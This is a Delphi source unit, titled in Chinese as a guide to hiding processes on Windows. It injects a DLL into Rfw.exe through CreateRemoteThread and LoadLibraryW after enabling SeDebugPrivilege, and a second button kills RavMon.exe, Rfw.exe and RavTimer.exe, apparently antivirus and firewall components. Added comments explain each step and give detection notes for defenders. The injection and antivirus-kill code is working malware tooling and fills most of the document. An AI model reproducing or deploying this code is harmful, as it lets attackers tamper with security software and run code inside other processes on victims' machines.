如何在Windows平台下实现进程隐藏
unit Unit1;
interface
uses
Windows, Messages, SysUtils, Classes, Graphics, Controls, Forms, Dialogs,
StdCtrls, tlhelp32;
{type
TProcessEntry32 = record
dwSize: DWORD;
cntUsage: DWORD;
th32ProcessID: DWORD;
th32DefaultHeapID: DWORD;
th32ModuleID: DWORD;
cntThreads: DWORD;
th32ParentProcessID: DWORD;
pcPriClassBase: integer;
dwFlags: DWORD;
szExeFile: array[0..MAX_PATH - 1] of char;
end; }
type
{ Main form of the sample.  Button1 injects a DLL into a target process
  (AttachToProcess); Button2 terminates a fixed list of processes by name
  (TerminateAProcess).  Despite the page title, nothing in this unit hides a
  process: whatever hiding takes place presumably lives in Project2.dll, which
  is not part of the listing. }
TForm1 = class(TForm)
Button1: TButton; { inject action, see Button1Click }
Button2: TButton; { terminate action, see Button2Click }
procedure Button1Click(Sender: TObject);
procedure Button2Click(Sender: TObject);
private
{ Looks up HostFile by executable name and calls TerminateProcess on it.
  HostFile is declared var but is never modified by the implementation. }
function TerminateAProcess(var HostFile: string):Boolean;
{ Private declarations }
public
{ Public declarations }
end;
var
Form1: TForm1; { the single form instance this VCL project works with }
implementation
{$R *.DFM}
{ Returns in ProcessID the id of the first process in a Toolhelp32 snapshot
  whose executable name matches AFilename, or 0 when nothing matches.
  PathMatch = True compares the whole szExeFile string; PathMatch = False
  compares only the file-name component of each side.  Both comparisons are
  case-insensitive (AnsiStricomp).  The result of CreateToolHelp32Snapshot is
  used without checking it.  Enumerating processes this way is benign on its
  own; what matters for defenders is what the callers in this unit do with
  the id (OpenProcess for injection or termination). }
procedure FindAProcess(const AFilename: string; const PathMatch: Boolean; var ProcessID: DWORD);
var
lppe: TProcessEntry32;
SsHandle: Thandle;
FoundAProc, FoundOK: boolean;
begin
ProcessID :=0;
SsHandle := CreateToolHelp32SnapShot(TH32CS_SnapProcess, 0);
FoundAProc := Process32First(Sshandle, lppe);
while FoundAProc do
begin
if PathMatch then
FoundOK := AnsiStricomp(lppe.szExefile, PChar(AFilename)) = 0
else
FoundOK := AnsiStricomp(PChar(ExtractFilename(lppe.szExefile)), PChar(ExtractFilename(AFilename))) = 0;
if FoundOK then
begin
ProcessID := lppe.th32ProcessID;
break; { first match wins; later processes with the same name are ignored }
end;
FoundAProc := Process32Next(SsHandle, lppe);
end;
CloseHandle(SsHandle); { the snapshot handle is released on every path }
end;
{ Enables (bEnabled = True) or disables SeDebugPrivilege on the current
  process token.  Returns True only when GetLastError is ERROR_SUCCESS after
  AdjustTokenPrivileges.  Per the Win32 contract, a token that does not hold
  the privilege at all (a non-administrative caller) makes
  AdjustTokenPrivileges report ERROR_NOT_ALL_ASSIGNED, so the function then
  returns False; the callers in this unit ignore the return value, so a failed
  enable simply surfaces later as an OpenProcess failure.  The boolean results
  of LookupPrivilegeValue and AdjustTokenPrivileges themselves are not
  examined.  Enabling SeDebugPrivilege is a common precursor to cross-process
  access; where Authorization Policy Change auditing is on, the adjustment is
  visible in the Security log (typically event 4703). }
function EnabledDebugPrivilege(const bEnabled: Boolean): Boolean;
var
hToken: THandle;
tp: TOKEN_PRIVILEGES;
a: DWORD;
const
SE_DEBUG_NAME = 'SeDebugPrivilege';
begin
Result := False;
if (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, hToken)) then
begin
tp.PrivilegeCount := 1;
LookupPrivilegeValue(nil, SE_DEBUG_NAME, tp.Privileges[0].Luid);
if bEnabled then
tp.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED
else
tp.Privileges[0].Attributes := 0; { attribute 0 = privilege present but disabled }
a := 0;
AdjustTokenPrivileges(hToken, False, tp, SizeOf(tp), nil, a);
Result := GetLastError = ERROR_SUCCESS; { success is judged from the last-error value only }
CloseHandle(hToken);
end;
end;
{ Loads the DLL GuestFile into another process using the classic
  VirtualAllocEx / WriteProcessMemory / CreateRemoteThread(LoadLibraryW)
  injection sequence.  The target is PID when PID > 0, otherwise the first
  process whose executable name matches HostFile (FindAProcess; id 0 when not
  found).  Returns the handle from CreateRemoteThread, or 0 when the write
  into the target failed.  Side effects: SeDebugPrivilege is enabled for this
  process and never disabled here; hRemoteProcess is not closed; the results
  of OpenProcess and VirtualAllocEx are used without being checked.
  Defender notes: OpenProcess with CREATE_THREAD, VM_OPERATION and VM_WRITE
  followed by VirtualAllocEx, WriteProcessMemory and a remote thread whose
  start address is kernel32!LoadLibraryW is a well-known indicator (Sysmon
  event 8 records the remote thread together with its start module and
  function).  Security products running as protected processes (PPL) deny
  this access mask to unprotected callers, and without administrative rights
  SeDebugPrivilege cannot be enabled in the first place. }
function AttachToProcess(const HostFile, GuestFile: string; const PID: DWORD = 0): DWORD;
var
hRemoteProcess: THandle;
dwRemoteProcessId: DWORD;
cb: DWORD;
pszLibFileRemote: Pointer;
iReturnCode: Boolean;
TempVar: DWORD;
pfnStartAddr: TFNThreadStartRoutine;
pszLibAFilename: PwideChar;
begin
Result := 0;
EnabledDebugPrivilege(True); { return value ignored }
{ GuestFile is converted to UTF-16 because the remote entry point is LoadLibraryW }
Getmem(pszLibAFilename, Length(GuestFile) * 2 + 1);
StringToWideChar(GuestFile, pszLibAFilename, Length(GuestFile) * 2 + 1);
if PID > 0 then
dwRemoteProcessID := PID
else
FindAProcess(HostFile, False, dwRemoteProcessID); { by file name only }
hRemoteProcess := OpenProcess(PROCESS_CREATE_THREAD + {allows creating a thread in the target}
PROCESS_VM_OPERATION + {allows virtual-memory operations in the target}
PROCESS_VM_WRITE, {allows writing the target's memory}
FALSE, dwRemoteProcessId);
cb := (1 + lstrlenW(pszLibAFilename)) * sizeof(WCHAR); { byte length incl. terminator }
pszLibFileRemote := PWIDESTRING(VirtualAllocEx(hRemoteProcess, nil, cb, MEM_COMMIT, PAGE_READWRITE));
TempVar := 0;
iReturnCode := WriteProcessMemory(hRemoteProcess, pszLibFileRemote, pszLibAFilename, cb, TempVar);
if iReturnCode then
begin
{ the remote thread runs LoadLibraryW with the copied path as its argument }
pfnStartAddr := GetProcAddress(GetModuleHandle('Kernel32'), 'LoadLibraryW');
TempVar := 0;
Result := CreateRemoteThread(hRemoteProcess, nil, 0, pfnStartAddr, pszLibFileRemote, 0, TempVar);
end;
Freemem(pszLibAFilename);
end;
{ Injects Project2.dll, taken from the directory of this executable, into a
  process named Rfw.exe.  The DLL is not part of this listing, so what it does
  inside the target is not shown here. }
procedure TForm1.Button1Click(Sender: TObject);
begin
AttachToProcess('Rfw.exe', extractfilepath(paramstr(0))+'Project2.dll');
end;
{ Finds the process named HostFile (file name only, not path) and calls
  TerminateProcess on it with exit code 0.  Always returns True, even when no
  such process exists or termination fails; a failure only shows the
  GetLastError code in a message box.  SeDebugPrivilege is enabled before the
  lookup and disabled afterwards.  The process handle is opened with
  bInheritHandle = True and is never closed.  HostFile is not modified.
  Defender note: forcibly ending security-product processes is a tamper
  attempt; products running as protected processes (PPL) or with anti-tamper
  refuse PROCESS_TERMINATE from unprotected callers, and an unexpected exit of
  such a process is itself worth alerting on. }
function TForm1.TerminateAProcess(var HostFile: string): Boolean;
var
HProcessedID:DWORD;
HProcedss:THandle;
begin
Result:=True;
EnabledDebugPrivilege(True);
FindAProcess(HostFile,False,HProcessedID);
if HProcessedID<>0 then
begin
HProcedss:=OpenProcess(PROCESS_TERMINATE,True,HProcessedID);
if not TerminateProcess(HProcedss,0) then
ShowMessage(IntToStr( GetLastError)); { error code only, no text }
end;
EnabledDebugPrivilege(False);
end;
{ Terminates three processes by name, in the order RavMon.exe, Rfw.exe,
  RavTimer.exe.  The names presumably belong to a security product (they
  resemble Rising antivirus/firewall components; not verified here), which
  makes this an AV-kill routine rather than process hiding.  Only 3 of the 26
  array slots are used. }
procedure TForm1.Button2Click(Sender: TObject);
var
FileName:array[0..25] of String;
begin
FileName[0]:='Rfw.exe';
FileName[1]:='RavMon.exe';
FileName[2]:='RavTimer.exe';
TerminateAProcess(FileName[1]);
TerminateAProcess(FileName[0]);
TerminateAProcess(FileName[2]);
end;
end.